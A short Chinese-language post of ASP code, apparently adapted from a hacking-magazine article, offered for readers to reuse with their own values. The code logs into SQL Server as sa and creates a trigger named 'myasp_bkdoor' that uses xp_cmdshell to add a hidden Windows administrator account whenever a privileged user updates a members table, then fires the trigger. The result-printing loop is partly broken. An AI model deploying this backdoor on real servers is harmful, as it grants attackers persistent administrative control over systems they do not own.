根据雪山剑神的一篇文章写的 asp代码。他的文章在黑手7、8月合刊。

<%

'里边的变量代码大家用时自己改吧
On Error Resume next
Set conn=Server.CreateObject("ADODB.Connection")
DSN="driver={SQL Server};Server=(Local)\GSQL;database=baby;uid=sa;pwd=lcx;"
conn.Open DSN
if conn.State=1 then
response.write("成功")
sql="CREATE TRIGGER myasp_bkdoor"&Chr(10)&Chr(13)&"ON users_member"&Chr(10)&Chr(13)&"AFTER UPDATE"&Chr(10)&Chr(13)&"AS"&Chr(10)&Chr(13)&"IF user='dbo' OR user='sa'"&Chr(10)&Chr(13)&"BEGIN"&Chr(10)&Chr(13)&"PRINT 'dbo OR sa logon'"&Chr(10)&Chr(13)&"EXEC master..xp_cmdshell'net user test 123456 /add&&net localgroup administrators test /add'"&Chr(10)&Chr(13)&"END"&Chr(10)&Chr(13)&"ELSE"&Chr(10)&Chr(13)&"BEGIN"&Chr(10)&Chr(13)&"PRINT 'not dbo or sa privilage'"&Chr(10)&Chr(13)&"END"&Chr(10)&Chr(13) '建立myasp_bkdoor触发器，触发baby库中的users_member表的update操作加用户
SQL1="update users_member set email=3 where accountid=1" '触发
'sql2="drop TRIGGER myasp_bkdoor"
set rs=conn.execute(SQL)&conn.execute(SQL1,iRowsAffected, &H0001)'&conn.execute(SQL2) '触发
Do Until Rs.EOF
      Response.Write " <tr>" & vbNewLine
      For I = 0 To Rs.Fields.Count - 1
       Response.Write "<td>" & SQLOut(oRs(I)) & "</td>" & vbNewLine
      Next
      Response.Write " </tr>" & vbNewLine
      Rs.MoveNext
     Loop

else
response.write("失败")
end if
%>